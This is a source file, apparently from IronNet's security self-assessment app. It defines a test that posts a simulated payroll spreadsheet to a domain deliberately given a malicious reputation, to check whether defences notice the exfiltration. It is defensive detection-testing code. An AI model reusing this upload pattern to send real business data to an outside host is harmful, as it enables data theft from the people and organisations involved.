import React, { Fragment } from 'react';

import {
  AssessmentListing,
  AssessmentResponse,
  KillChain,
  Risk,
  getTestResult
} from '../../models/Assessment';
import getExcelData from '../helpers/payroll';
import media from '../../assets/SensitiveBusinessInformationTheft.jpg';
import api from '../../api';

async function doAssessment(): Promise<AssessmentResponse> {
  let result = { risk: Risk.Low };
  const blob = new Blob([getExcelData()], {
    type: 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
  });

  try {
    const res = await api({
      url: `${process.env.REACT_APP_ACCESS_01}/a.php`,
      method: 'POST',
      data: blob
    });
    result = getTestResult(res);
  } catch (err) {
    console.warn(err);
  }

  return result;
}

const assessment: AssessmentListing = {
  category: KillChain.ACCESS,
  name: 'Sensitive Business Information Theft',
  media,
  longDesc: (
    <Fragment>
      <p>This test posts simulated sensitive business information to a known malicious domain.</p>
      <ul>
        <li>
          The domain used for this test is fully owned by IronNet and is not actually malicious, but
          has been intentionally created to have a malicious reputation. IronNet does not collect or
          send any sensitive data during this test.
        </li>
      </ul>
    </Fragment>
  ),
  shortDesc:
    'This test simulates the act of sensitive business information being submitted to a known malicious domain.',
  characteristics:
    'A normal HTTPS connection is created to a known malicious domain, which is then used to transfer data.',
  warnings: {
    ironnet: [
      'Transmit simulated sensitive business information to a domain with a “malicious” reputation.'
    ],
    attacker: [
      'Steal sensitive business information by sending it to a known malicious website.',
      'Use stolen business information to further target internal systems, people, or other companies.'
    ]
  },
  why:
    'IronDefense uses anomaly and behavior-based detection to identify malicious domains without relying on threat intel.  Even new, never-reported-on malicious domains can be identified.',
  how:
    'Attackers continue to use domains even after they have been flagged as malicious by security vendors.  Effectively using and updating the latest threat intel is a challenge in many organization.',
  doAssessment
};

export default assessment;
